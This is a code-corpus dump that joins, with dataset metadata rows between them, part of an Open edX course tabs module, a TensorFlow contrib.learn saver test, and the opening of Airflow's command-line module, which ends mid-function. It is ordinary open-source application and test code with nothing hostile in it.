if self.is_hidden:
to_json_val.update({'is_hidden': True})
return to_json_val
def __eq__(self, other):
if not super(HideableTab, self).__eq__(other):
return False
return self.is_hidden == other.get('is_hidden', False)
class CoursewareTab(EnrolledOrStaffTab):
"""
A tab containing the course content.
"""
type = 'courseware'
icon = 'fa fa-edit'
is_movable = False
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(CoursewareTab, self).__init__(
# Translators: 'Courseware' refers to the tab in the courseware that leads to the content of a course
name=_('Courseware'), # support fixed name for the courseware tab
tab_id=self.type,
link_func=link_reverse_func(self.type),
)
class CourseInfoTab(CourseTab):
"""
A tab containing information about the course.
"""
type = 'course_info'
icon = 'fa fa-info-circle'
is_movable = False
def __init__(self, tab_dict=None):
super(CourseInfoTab, self).__init__(
# Translators: "Course Info" is the name of the course's information and updates page
name=tab_dict['name'] if tab_dict else _('Course Info'),
tab_id='info',
link_func=link_reverse_func('info'),
)
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(CourseInfoTab, cls).validate(tab_dict, raise_error) and need_name(tab_dict, raise_error)
class ProgressTab(EnrolledOrStaffTab):
"""
A tab containing information about the authenticated user's progress.
"""
type = 'progress'
icon = 'fa fa-bar-chart'
def __init__(self, tab_dict=None):
super(ProgressTab, self).__init__(
# Translators: "Progress" is the name of the student's course progress page
name=tab_dict['name'] if tab_dict else _('Progress'),
tab_id=self.type,
link_func=link_reverse_func(self.type),
)
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
super_can_display = super(ProgressTab, self).can_display(
course, settings, is_user_authenticated, is_user_staff, is_user_enrolled
)
return super_can_display and not course.hide_progress_tab
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(ProgressTab, cls).validate(tab_dict, raise_error) and need_name(tab_dict, raise_error)
class WikiTab(HideableTab):
"""
    A tab containing the course wiki.
"""
type = 'wiki'
icon = 'fa fa-comment'
def __init__(self, tab_dict=None):
super(WikiTab, self).__init__(
# Translators: "Wiki" is the name of the course's wiki page
name=tab_dict['name'] if tab_dict else _('Wiki'),
tab_id=self.type,
link_func=link_reverse_func('course_wiki'),
tab_dict=tab_dict,
)
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
return settings.WIKI_ENABLED and (
course.allow_public_wiki_access or is_user_enrolled or is_user_staff
)
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(WikiTab, cls).validate(tab_dict, raise_error) and need_name(tab_dict, raise_error)
class DiscussionTab(EnrolledOrStaffTab):
"""
A tab only for the new Berkeley discussion forums.
"""
type = 'discussion'
icon = 'fa fa-comments'
def __init__(self, tab_dict=None):
super(DiscussionTab, self).__init__(
# Translators: "Discussion" is the title of the course forum page
name=tab_dict['name'] if tab_dict else _('Discussion'),
tab_id=self.type,
link_func=link_reverse_func('django_comment_client.forum.views.forum_form_discussion'),
)
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
super_can_display = super(DiscussionTab, self).can_display(
course, settings, is_user_authenticated, is_user_staff, is_user_enrolled
)
return settings.FEATURES.get('ENABLE_DISCUSSION_SERVICE') and super_can_display
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(DiscussionTab, cls).validate(tab_dict, raise_error) and need_name(tab_dict, raise_error)
class LinkTab(CourseTab):
"""
Abstract class for tabs that contain external links.
"""
link_value = ''
def __init__(self, name, tab_id, link_value):
self.link_value = link_value
super(LinkTab, self).__init__(
name=name,
tab_id=tab_id,
link_func=link_value_func(self.link_value),
)
def __getitem__(self, key):
if key == 'link':
return self.link_value
else:
return super(LinkTab, self).__getitem__(key)
def __setitem__(self, key, value):
if key == 'link':
self.link_value = value
else:
super(LinkTab, self).__setitem__(key, value)
def to_json(self):
to_json_val = super(LinkTab, self).to_json()
to_json_val.update({'link': self.link_value})
return to_json_val
def __eq__(self, other):
if not super(LinkTab, self).__eq__(other):
return False
return self.link_value == other.get('link')
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(LinkTab, cls).validate(tab_dict, raise_error) and key_checker(['link'])(tab_dict, raise_error)
class ExternalDiscussionTab(LinkTab):
"""
A tab that links to an external discussion service.
"""
type = 'external_discussion'
icon = 'fa fa-question-circle'
def __init__(self, tab_dict=None, link_value=None):
super(ExternalDiscussionTab, self).__init__(
# Translators: 'Discussion' refers to the tab in the courseware that leads to the discussion forums
name=_('Discussion'),
tab_id='discussion',
link_value=tab_dict['link'] if tab_dict else link_value,
)
class ExternalLinkTab(LinkTab):
"""
A tab containing an external link.
"""
type = 'external_link'
icon = 'fa fa-question-circle'
def __init__(self, tab_dict):
super(ExternalLinkTab, self).__init__(
name=tab_dict['name'],
tab_id=None, # External links are never active.
link_value=tab_dict['link'],
)
class StaticTab(CourseTab):
"""
A custom tab.
"""
type = 'static_tab'
icon = 'fa fa-circle'
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(StaticTab, cls).validate(tab_dict, raise_error) and key_checker(['name', 'url_slug'])(tab_dict, raise_error)
def __init__(self, tab_dict=None, name=None, url_slug=None):
self.url_slug = tab_dict['url_slug'] if tab_dict else url_slug
super(StaticTab, self).__init__(
name=tab_dict['name'] if tab_dict else name,
tab_id='static_tab_{0}'.format(self.url_slug),
link_func=lambda course, reverse_func: reverse_func(self.type, args=[course.id.to_deprecated_string(), self.url_slug]),
)
def __getitem__(self, key):
if key == 'url_slug':
return self.url_slug
else:
return super(StaticTab, self).__getitem__(key)
def __setitem__(self, key, value):
if key == 'url_slug':
self.url_slug = value
else:
super(StaticTab, self).__setitem__(key, value)
def to_json(self):
to_json_val = super(StaticTab, self).to_json()
to_json_val.update({'url_slug': self.url_slug})
return to_json_val
def __eq__(self, other):
if not super(StaticTab, self).__eq__(other):
return False
return self.url_slug == other.get('url_slug')
class SingleTextbookTab(CourseTab):
"""
A tab representing a single textbook. It is created temporarily when enumerating all textbooks within a
Textbook collection tab. It should not be serialized or persisted.
"""
type = 'single_textbook'
icon = 'fa fa-book'
is_movable = False
is_collection_item = True
def to_json(self):
raise NotImplementedError('SingleTextbookTab should not be serialized.')
class TextbookTabsBase(AuthenticatedCourseTab):
"""
Abstract class for textbook collection tabs classes.
"""
is_collection = True
def __init__(self, tab_id):
        # Translators: 'Textbooks' refers to the tab in the course that leads to the course's textbooks
super(TextbookTabsBase, self).__init__(
name=_("Textbooks"),
tab_id=tab_id,
link_func=None,
)
@abstractmethod
def items(self, course):
"""
A generator for iterating through all the SingleTextbookTab book objects associated with this
collection of textbooks.
"""
pass
class TextbookTabs(TextbookTabsBase):
"""
A tab representing the collection of all textbook tabs.
"""
type = 'textbooks'
icon = 'fa fa-book'
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(TextbookTabs, self).__init__(
tab_id=self.type,
)
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
return settings.FEATURES.get('ENABLE_TEXTBOOK')
def items(self, course):
for index, textbook in enumerate(course.textbooks):
yield SingleTextbookTab(
name=textbook.title,
tab_id='textbook/{0}'.format(index),
link_func=lambda course, reverse_func, index=index: reverse_func(
'book', args=[course.id.to_deprecated_string(), index]
),
)
class PDFTextbookTabs(TextbookTabsBase):
"""
A tab representing the collection of all PDF textbook tabs.
"""
type = 'pdf_textbooks'
icon = 'fa fa-book'
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(PDFTextbookTabs, self).__init__(
tab_id=self.type,
)
def items(self, course):
for index, textbook in enumerate(course.pdf_textbooks):
yield SingleTextbookTab(
name=textbook['tab_title'],
tab_id='pdftextbook/{0}'.format(index),
link_func=lambda course, reverse_func, index=index: reverse_func(
'pdf_book', args=[course.id.to_deprecated_string(), index]
),
)
class HtmlTextbookTabs(TextbookTabsBase):
"""
A tab representing the collection of all Html textbook tabs.
"""
type = 'html_textbooks'
icon = 'fa fa-book'
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(HtmlTextbookTabs, self).__init__(
tab_id=self.type,
)
def items(self, course):
for index, textbook in enumerate(course.html_textbooks):
yield SingleTextbookTab(
name=textbook['tab_title'],
tab_id='htmltextbook/{0}'.format(index),
link_func=lambda course, reverse_func, index=index: reverse_func(
'html_book', args=[course.id.to_deprecated_string(), index]
),
)
class GradingTab(object):
"""
Abstract class for tabs that involve Grading.
"""
pass
class StaffGradingTab(StaffTab, GradingTab):
"""
A tab for staff grading.
"""
type = 'staff_grading'
icon = 'fa fa-check-square-o'
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(StaffGradingTab, self).__init__(
# Translators: "Staff grading" appears on a tab that allows
# staff to view open-ended problems that require staff grading
name=_("Staff grading"),
tab_id=self.type,
link_func=link_reverse_func(self.type),
)
class PeerGradingTab(AuthenticatedCourseTab, GradingTab):
"""
A tab for peer grading.
"""
type = 'peer_grading'
icon = 'fa fa-check-square-o'
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(PeerGradingTab, self).__init__(
# Translators: "Peer grading" appears on a tab that allows
# students to view open-ended problems that require grading
name=_("Peer grading"),
tab_id=self.type,
link_func=link_reverse_func(self.type),
)
class OpenEndedGradingTab(AuthenticatedCourseTab, GradingTab):
"""
A tab for open ended grading.
"""
type = 'open_ended'
icon = 'fa fa-check-square-o'
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(OpenEndedGradingTab, self).__init__(
# Translators: "Open Ended Panel" appears on a tab that, when clicked, opens up a panel that
# displays information about open-ended problems that a user has submitted or needs to grade
name=_("Open Ended Panel"),
tab_id=self.type,
link_func=link_reverse_func('open_ended_notifications'),
)
class SyllabusTab(CourseTab):
"""
A tab for the course syllabus.
"""
type = 'syllabus'
icon = 'fa fa-list-alt'
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
return hasattr(course, 'syllabus_present') and course.syllabus_present
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(SyllabusTab, self).__init__(
# Translators: "Syllabus" appears on a tab that, when clicked, opens the syllabus of the course.
name=_('Syllabus'),
tab_id=self.type,
link_func=link_reverse_func(self.type),
)
class NotesTab(AuthenticatedCourseTab):
"""
A tab for the course notes.
"""
type = 'notes'
icon = 'fa fa-file-text'
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
return settings.FEATURES.get('ENABLE_STUDENT_NOTES')
def __init__(self, tab_dict=None):
super(NotesTab, self).__init__(
name=tab_dict['name'],
tab_id=self.type,
link_func=link_reverse_func(self.type),
)
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(NotesTab, cls).validate(tab_dict, raise_error) and need_name(tab_dict, raise_error)
class EdxNotesTab(AuthenticatedCourseTab):
"""
A tab for the course student notes.
"""
type = 'edxnotes'
icon = 'fa fa-file-text'
def can_display(self, course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
return settings.FEATURES.get('ENABLE_EDXNOTES')
def __init__(self, tab_dict=None):
super(EdxNotesTab, self).__init__(
name=tab_dict['name'] if tab_dict else _('Notes'),
tab_id=self.type,
link_func=link_reverse_func(self.type),
)
@classmethod
def validate(cls, tab_dict, raise_error=True):
return super(EdxNotesTab, cls).validate(tab_dict, raise_error) and need_name(tab_dict, raise_error)
class InstructorTab(StaffTab):
"""
A tab for the course instructors.
"""
type = 'instructor'
icon = 'fa fa-gears'
def __init__(self, tab_dict=None): # pylint: disable=unused-argument
super(InstructorTab, self).__init__(
# Translators: 'Instructor' appears on the tab that leads to the instructor dashboard, which is
# a portal where an instructor can get data and perform various actions on their course
name=_('Instructor'),
tab_id=self.type,
link_func=link_reverse_func('instructor_dashboard'),
)
class CourseTabList(List):
"""
An XBlock field class that encapsulates a collection of Tabs in a course.
It is automatically created and can be retrieved through a CourseDescriptor object: course.tabs
"""
@staticmethod
def initialize_default(course):
"""
An explicit initialize method is used to set the default values, rather than implementing an
__init__ method. This is because the default values are dependent on other information from
within the course.
"""
course.tabs.extend([
CoursewareTab(),
CourseInfoTab(),
])
# Presence of syllabus tab is indicated by a course attribute
if hasattr(course, 'syllabus_present') and course.syllabus_present:
course.tabs.append(SyllabusTab())
# If the course has a discussion link specified, use that even if we feature
# flag discussions off. Disabling that is mostly a server safety feature
# at this point, and we don't need to worry about external sites.
if course.discussion_link:
discussion_tab = ExternalDiscussionTab(link_value=course.discussion_link)
else:
discussion_tab = DiscussionTab()
course.tabs.extend([
TextbookTabs(),
discussion_tab,
WikiTab(),
ProgressTab(),
])
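    # Illustrative result (a sketch, not normative): for a typical course this
    # leaves course.tabs as [Courseware, Course Info, (Syllabus if present),
    # Textbooks, Discussion or External Discussion, Wiki, Progress].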
@staticmethod
def get_discussion(course):
"""
Returns the discussion tab for the given course. It can be either of type DiscussionTab
or ExternalDiscussionTab. The returned tab object is self-aware of the 'link' that it corresponds to.
"""
# the discussion_link setting overrides everything else, even if there is a discussion tab in the course tabs
if course.discussion_link:
return ExternalDiscussionTab(link_value=course.discussion_link)
# find one of the discussion tab types in the course tabs
for tab in course.tabs:
if isinstance(tab, DiscussionTab) or isinstance(tab, ExternalDiscussionTab):
return tab
return None
@staticmethod
def get_tab_by_slug(tab_list, url_slug):
"""
Look for a tab with the specified 'url_slug'. Returns the tab or None if not found.
"""
return next((tab for tab in tab_list if tab.get('url_slug') == url_slug), None)
@staticmethod
def get_tab_by_type(tab_list, tab_type):
"""
Look for a tab with the specified type. Returns the first matching tab.
"""
return next((tab for tab in tab_list if tab.type == tab_type), None)
@staticmethod
def get_tab_by_id(tab_list, tab_id):
"""
Look for a tab with the specified tab_id. Returns the first matching tab.
"""
return next((tab for tab in tab_list if tab.tab_id == tab_id), None)
@staticmethod
def iterate_displayable(
course,
settings,
is_user_authenticated=True,
is_user_staff=True,
is_user_enrolled=False
):
"""
Generator method for iterating through all tabs that can be displayed for the given course and
the given user with the provided access settings.
"""
for tab in course.tabs:
if tab.can_display(
course, settings, is_user_authenticated, is_user_staff, is_user_enrolled
) and (not tab.is_hideable or not tab.is_hidden):
if tab.is_collection:
for item in tab.items(course):
yield item
else:
yield tab
instructor_tab = InstructorTab()
if instructor_tab.can_display(course, settings, is_user_authenticated, is_user_staff, is_user_enrolled):
yield instructor_tab
@staticmethod
def iterate_displayable_cms(
course,
settings
):
"""
Generator method for iterating through all tabs that can be displayed for the given course
with the provided settings.
"""
for tab in course.tabs:
if tab.can_display(course, settings, is_user_authenticated=True, is_user_staff=True, is_user_enrolled=True):
if tab.is_collection and not len(list(tab.items(course))):
# do not yield collections that have no items
continue
yield tab
@classmethod
def validate_tabs(cls, tabs):
"""
Check that the tabs set for the specified course is valid. If it
isn't, raise InvalidTabsException with the complaint.
Specific rules checked:
- if no tabs specified, that's fine
- if tabs specified, first two must have type 'courseware' and 'course_info', in that order.
"""
if tabs is None or len(tabs) == 0:
return
if len(tabs) < 2:
raise InvalidTabsException("Expected at least two tabs. tabs: '{0}'".format(tabs))
if tabs[0].get('type') != CoursewareTab.type:
raise InvalidTabsException(
"Expected first tab to have type 'courseware'. tabs: '{0}'".format(tabs))
if tabs[1].get('type') != CourseInfoTab.type:
raise InvalidTabsException(
"Expected second tab to have type 'course_info'. tabs: '{0}'".format(tabs))
# the following tabs should appear only once
for tab_type in [
CoursewareTab.type,
CourseInfoTab.type,
NotesTab.type,
TextbookTabs.type,
PDFTextbookTabs.type,
HtmlTextbookTabs.type,
EdxNotesTab.type]:
cls._validate_num_tabs_of_type(tabs, tab_type, 1)
@staticmethod
def _validate_num_tabs_of_type(tabs, tab_type, max_num):
"""
Check that the number of times that the given 'tab_type' appears in 'tabs' is less than or equal to 'max_num'.
"""
count = sum(1 for tab in tabs if tab.get('type') == tab_type)
if count > max_num:
msg = (
"Tab of type '{type}' appears {count} time(s). "
"Expected maximum of {max} time(s)."
).format(
type=tab_type, count=count, max=max_num,
)
raise InvalidTabsException(msg)
def to_json(self, values):
"""
Overrides the to_json method to serialize all the CourseTab objects to a json-serializable representation.
"""
json_data = []
if values:
for val in values:
if isinstance(val, CourseTab):
json_data.append(val.to_json())
elif isinstance(val, dict):
json_data.append(val)
else:
continue
return json_data
def from_json(self, values):
"""
Overrides the from_json method to de-serialize the CourseTab objects from a json-like representation.
"""
self.validate_tabs(values)
return [CourseTab.from_json(tab_dict) for tab_dict in values]
#### Link Functions
def link_reverse_func(reverse_name):
"""
Returns a function that takes in a course and reverse_url_func,
    and calls the reverse_url_func with the given reverse_name and the course's ID.
"""
return lambda course, reverse_url_func: reverse_url_func(reverse_name, args=[course.id.to_deprecated_string()])
def link_value_func(value):
"""
    Returns a function that takes in a course and reverse_url_func, and returns the given value.
"""
return lambda course, reverse_url_func: value
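# Illustrative use of the link functions above (a sketch; `reverse` stands in for a
# Django-style URL reverser supplied by the caller):
#   CoursewareTab().link_func(course, reverse)
#   # -> reverse('courseware', args=[course.id.to_deprecated_string()])
#   ExternalLinkTab({'name': 'Docs', 'link': 'http://example.com'}).link_func(course, reverse)
#   # -> 'http://example.com'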
#### Validators
# A validator takes a dict and raises InvalidTabsException if required fields are missing or otherwise wrong.
# (e.g. "is there a 'name' field?). Validators can assume that the type field is valid.
def key_checker(expected_keys):
"""
Returns a function that checks that specified keys are present in a dict.
"""
def check(actual_dict, raise_error=True):
"""
        Function that checks whether all keys in the expected_keys object are in the given actual_dict object.
"""
missing = set(expected_keys) - set(actual_dict.keys())
if not missing:
return True
if raise_error:
raise InvalidTabsException(
"Expected keys '{0}' are not present in the given dict: {1}".format(expected_keys, actual_dict)
)
else:
return False
return check
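# Illustrative usage of key_checker (a sketch, not part of the original module):
#   check = key_checker(['type', 'name'])
#   check({'type': 'static_tab', 'name': 'About'})       # -> True
#   check({'type': 'static_tab'}, raise_error=False)     # -> False
#   check({'type': 'static_tab'})                        # raises InvalidTabsException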
def need_name(dictionary, raise_error=True):
"""
Returns whether the 'name' key exists in the given dictionary.
"""
return key_checker(['name'])(dictionary, raise_error)
class InvalidTabsException(Exception):
"""
A complaint about invalid tabs.
"""
pass
class UnequalTabsException(Exception):
"""
A complaint about tab lists being unequal
"""
pass
| agpl-3.0 | -3,983,259,697,770,877,000 | 33.856016 | 135 | 0.610627 | false |
shakamunyi/tensorflow | tensorflow/contrib/learn/python/learn/tests/saver_test.py | 1 | 4093 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Save and restore tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import tensorflow as tf
from tensorflow.contrib.learn.python import learn
from tensorflow.contrib.learn.python.learn import datasets
class SaverTest(tf.test.TestCase):
"""Save and restore tests."""
def testIris(self):
path = tf.test.get_temp_dir() + '/tmp.saver'
random.seed(42)
iris = datasets.load_iris()
cont_features = [
tf.contrib.layers.real_valued_column('', dimension=4)]
classifier = learn.LinearClassifier(
feature_columns=cont_features, n_classes=3, model_dir=path)
classifier.fit(iris.data, iris.target, steps=200)
# TODO(ipolosukhin): Remove or restore.
# new_classifier = learn.TensorFlowEstimator.restore(path)
# self.assertEqual(type(new_classifier), type(classifier))
# score = accuracy_score(iris.target, new_classifier.predict(iris.data))
# self.assertGreater(score, 0.5, 'Failed with score = {0}'.format(score))
def testCustomModel(self):
path = tf.test.get_temp_dir() + '/tmp.saver2'
random.seed(42)
iris = datasets.load_iris()
def _custom_model(x, y):
return learn.models.logistic_regression(x, y)
classifier = learn.TensorFlowEstimator(model_fn=_custom_model, n_classes=3)
classifier.fit(iris.data, iris.target)
classifier.save(path)
# TODO(ipolosukhin): Remove or restore.
# new_classifier = learn.TensorFlowEstimator.restore(path)
# self.assertEqual(type(new_classifier), type(classifier))
# score = accuracy_score(iris.target, new_classifier.predict(iris.data))
# self.assertGreater(score, 0.5, 'Failed with score = {0}'.format(score))
def testDNN(self):
random.seed(42)
iris = datasets.load_iris()
cont_features = [
tf.contrib.layers.real_valued_column('', dimension=4)]
classifier = learn.DNNClassifier(feature_columns=cont_features,
hidden_units=[10, 20, 10],
n_classes=3)
classifier.fit(iris.data, iris.target, max_steps=100)
# TODO(ipolosukhin): Remove or restore.
# path = tf.test.get_temp_dir() + '/tmp_saver3'
# classifier.save(path)
# new_classifier = learn.TensorFlowEstimator.restore(path)
# self.assertEqual(type(new_classifier), type(classifier))
# score = accuracy_score(iris.target, new_classifier.predict(iris.data))
# self.assertGreater(score, 0.5, 'Failed with score = {0}'.format(score))
def testNoFolder(self):
with self.assertRaises(ValueError):
learn.TensorFlowEstimator.restore('no_model_path')
def testNoCheckpoints(self):
random.seed(42)
iris = datasets.load_iris()
cont_features = [
tf.contrib.layers.real_valued_column('', dimension=4)]
classifier = learn.DNNClassifier(feature_columns=cont_features,
hidden_units=[10, 20, 10],
n_classes=3)
classifier.fit(iris.data, iris.target, max_steps=100)
# TODO(ipolosukhin): Remove or restore.
# path = tf.test.get_temp_dir() + '/tmp/tmp.saver4'
# classifier.save(path)
# os.remove(os.path.join(path, 'checkpoint'))
# with self.assertRaises(NotImplementedError):
# learn.TensorFlowEstimator.restore(path)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 | 724,406,720,324,615,200 | 39.127451 | 80 | 0.664794 | false |
opensignal/airflow | airflow/bin/cli.py | 1 | 25070 | #!/usr/bin/env python
from __future__ import print_function
import logging
import os
import subprocess
import textwrap
import warnings
from datetime import datetime
import argparse
from builtins import input
from collections import namedtuple
from dateutil.parser import parse as parsedate
import json
import airflow
from airflow import jobs, settings, utils
from airflow import configuration as conf
from airflow.executors import DEFAULT_EXECUTOR
from airflow.models import DagModel, DagBag, TaskInstance, DagPickle, DagRun
from airflow.utils import AirflowException, State
DAGS_FOLDER = os.path.expanduser(conf.get('core', 'DAGS_FOLDER'))
def process_subdir(subdir):
dags_folder = conf.get("core", "DAGS_FOLDER")
dags_folder = os.path.expanduser(dags_folder)
if subdir:
if "DAGS_FOLDER" in subdir:
subdir = subdir.replace("DAGS_FOLDER", dags_folder)
subdir = os.path.abspath(os.path.expanduser(subdir))
if dags_folder.rstrip('/') not in subdir.rstrip('/'):
raise AirflowException(
"subdir has to be part of your DAGS_FOLDER as defined in your "
"airflow.cfg. DAGS_FOLDER is {df} and subdir is {sd}".format(
df=dags_folder, sd=subdir))
return subdir
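# Illustrative behaviour (a sketch, assuming DAGS_FOLDER resolves to /home/airflow/dags):
#   process_subdir('DAGS_FOLDER/examples')  # -> '/home/airflow/dags/examples'
#   process_subdir('/tmp/elsewhere')        # raises AirflowException (outside DAGS_FOLDER)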
def get_dag(args):
dagbag = DagBag(process_subdir(args.subdir))
if args.dag_id not in dagbag.dags:
raise AirflowException('dag_id could not be found')
return dagbag.dags[args.dag_id]
def backfill(args, dag=None):
logging.basicConfig(
level=settings.LOGGING_LEVEL,
format=settings.SIMPLE_LOG_FORMAT)
dag = dag or get_dag(args)
if not args.start_date and not args.end_date:
raise AirflowException("Provide a start_date and/or end_date")
# If only one date is passed, using same as start and end
args.end_date = args.end_date or args.start_date
args.start_date = args.start_date or args.end_date
if args.task_regex:
dag = dag.sub_dag(
task_regex=args.task_regex,
include_upstream=not args.ignore_dependencies)
if args.dry_run:
print("Dry run of DAG {0} on {1}".format(args.dag_id,
args.start_date))
for task in dag.tasks:
print("Task {0}".format(task.task_id))
ti = TaskInstance(task, args.start_date)
ti.dry_run()
else:
dag.run(
start_date=args.start_date,
end_date=args.end_date,
mark_success=args.mark_success,
include_adhoc=args.include_adhoc,
local=args.local,
donot_pickle=(args.donot_pickle or conf.getboolean('core', 'donot_pickle')),
ignore_dependencies=args.ignore_dependencies,
pool=args.pool)
def trigger_dag(args):
session = settings.Session()
# TODO: verify dag_id
execution_date = datetime.now()
run_id = args.run_id or "manual__{0}".format(execution_date.isoformat())
dr = session.query(DagRun).filter(
DagRun.dag_id == args.dag_id, DagRun.run_id == run_id).first()
conf = {}
if args.conf:
conf = json.loads(args.conf)
if dr:
logging.error("This run_id already exists")
else:
trigger = DagRun(
dag_id=args.dag_id,
run_id=run_id,
execution_date=execution_date,
state=State.RUNNING,
conf=conf,
external_trigger=True)
session.add(trigger)
logging.info("Created {}".format(trigger))
session.commit()
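# Illustrative CLI invocation that reaches trigger_dag (a sketch; the dag id and
# payload below are hypothetical):
#   airflow trigger_dag example_dag -r manual_run_1 -c '{"key": "value"}'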
def pause(args, dag=None):
set_is_paused(True, args, dag)
def unpause(args, dag=None):
set_is_paused(False, args, dag)
def set_is_paused(is_paused, args, dag=None):
dag = dag or get_dag(args)
session = settings.Session()
dm = session.query(DagModel).filter(
DagModel.dag_id == dag.dag_id).first()
dm.is_paused = is_paused
session.commit()
msg = "Dag: {}, paused: {}".format(dag, str(dag.is_paused))
print(msg)
def run(args, dag=None):
utils.pessimistic_connection_handling()
if dag:
args.dag_id = dag.dag_id
# Setting up logging
log_base = os.path.expanduser(conf.get('core', 'BASE_LOG_FOLDER'))
directory = log_base + "/{args.dag_id}/{args.task_id}".format(args=args)
if not os.path.exists(directory):
os.makedirs(directory)
iso = args.execution_date.isoformat()
filename = "{directory}/{iso}".format(**locals())
logging.root.handlers = []
logging.basicConfig(
filename=filename,
level=settings.LOGGING_LEVEL,
format=settings.LOG_FORMAT)
if not args.pickle and not dag:
dag = get_dag(args)
elif not dag:
session = settings.Session()
logging.info('Loading pickle id {args.pickle}'.format(**locals()))
dag_pickle = session.query(
DagPickle).filter(DagPickle.id == args.pickle).first()
if not dag_pickle:
raise AirflowException("Who hid the pickle!? [missing pickle]")
dag = dag_pickle.pickle
task = dag.get_task(task_id=args.task_id)
ti = TaskInstance(task, args.execution_date)
if args.local:
print("Logging into: " + filename)
run_job = jobs.LocalTaskJob(
task_instance=ti,
mark_success=args.mark_success,
force=args.force,
pickle_id=args.pickle,
task_start_date=args.task_start_date,
ignore_dependencies=args.ignore_dependencies,
pool=args.pool)
run_job.run()
elif args.raw:
ti.run(
mark_success=args.mark_success,
force=args.force,
ignore_dependencies=args.ignore_dependencies,
job_id=args.job_id,
pool=args.pool,
)
else:
pickle_id = None
if args.ship_dag:
try:
# Running remotely, so pickling the DAG
session = settings.Session()
pickle = DagPickle(dag)
session.add(pickle)
session.commit()
pickle_id = pickle.id
print((
'Pickled dag {dag} '
'as pickle_id:{pickle_id}').format(**locals()))
except Exception as e:
print('Could not pickle the DAG')
print(e)
raise e
executor = DEFAULT_EXECUTOR
executor.start()
print("Sending to executor.")
executor.queue_task_instance(
ti,
mark_success=args.mark_success,
pickle_id=pickle_id,
ignore_dependencies=args.ignore_dependencies,
force=args.force,
pool=args.pool)
executor.heartbeat()
executor.end()
# store logs remotely
remote_base = conf.get('core', 'REMOTE_BASE_LOG_FOLDER')
# deprecated as of March 2016
if not remote_base and conf.get('core', 'S3_LOG_FOLDER'):
warnings.warn(
'The S3_LOG_FOLDER conf key has been replaced by '
'REMOTE_BASE_LOG_FOLDER. Your conf still works but please '
'update airflow.cfg to ensure future compatibility.',
DeprecationWarning)
remote_base = conf.get('core', 'S3_LOG_FOLDER')
if os.path.exists(filename):
# read log and remove old logs to get just the latest additions
with open(filename, 'r') as logfile:
log = logfile.read()
remote_log_location = filename.replace(log_base, remote_base)
# S3
if remote_base.startswith('s3:/'):
utils.S3Log().write(log, remote_log_location)
# GCS
elif remote_base.startswith('gs:/'):
utils.GCSLog().write(
log,
remote_log_location,
append=True)
# Other
elif remote_base:
logging.error(
'Unsupported remote log location: {}'.format(remote_base))
def task_state(args):
"""
Returns the state of a TaskInstance at the command line.
>>> airflow task_state tutorial sleep 2015-01-01
success
"""
dag = get_dag(args)
task = dag.get_task(task_id=args.task_id)
ti = TaskInstance(task, args.execution_date)
print(ti.current_state())
def list_dags(args):
dagbag = DagBag(process_subdir(args.subdir))
print("\n".join(sorted(dagbag.dags)))
def list_tasks(args, dag=None):
dag = dag or get_dag(args)
if args.tree:
dag.tree_view()
else:
tasks = sorted([t.task_id for t in dag.tasks])
print("\n".join(sorted(tasks)))
def test(args, dag=None):
dag = dag or get_dag(args)
task = dag.get_task(task_id=args.task_id)
# Add CLI provided task_params to task.params
if args.task_params:
passed_in_params = json.loads(args.task_params)
task.params.update(passed_in_params)
ti = TaskInstance(task, args.execution_date)
if args.dry_run:
ti.dry_run()
else:
ti.run(force=True, ignore_dependencies=True, test_mode=True)
def render(args):
dag = get_dag(args)
task = dag.get_task(task_id=args.task_id)
ti = TaskInstance(task, args.execution_date)
ti.render_templates()
for attr in task.__class__.template_fields:
print(textwrap.dedent("""\
# ----------------------------------------------------------
# property: {}
# ----------------------------------------------------------
{}
""".format(attr, getattr(task, attr))))
def clear(args):
logging.basicConfig(
level=settings.LOGGING_LEVEL,
format=settings.SIMPLE_LOG_FORMAT)
dag = get_dag(args)
if args.task_regex:
dag = dag.sub_dag(
task_regex=args.task_regex,
include_downstream=args.downstream,
include_upstream=args.upstream,
)
dag.clear(
start_date=args.start_date,
end_date=args.end_date,
only_failed=args.only_failed,
only_running=args.only_running,
confirm_prompt=not args.no_confirm)
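# Illustrative CLI invocation that reaches clear (a sketch; the dag id, regex and
# dates below are hypothetical):
#   airflow clear example_dag -t "transform_.*" -s 2015-01-01 -e 2015-01-02 -c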
def webserver(args):
print(settings.HEADER)
from airflow.www.app import cached_app
app = cached_app(conf)
workers = args.workers or conf.get('webserver', 'workers')
if args.debug:
print(
"Starting the web server on port {0} and host {1}.".format(
args.port, args.hostname))
app.run(debug=True, port=args.port, host=args.hostname)
else:
print(
            'Running the Gunicorn server with {workers} {args.workerclass} '
            'workers on host {args.hostname} and port '
'{args.port}...'.format(**locals()))
sp = subprocess.Popen([
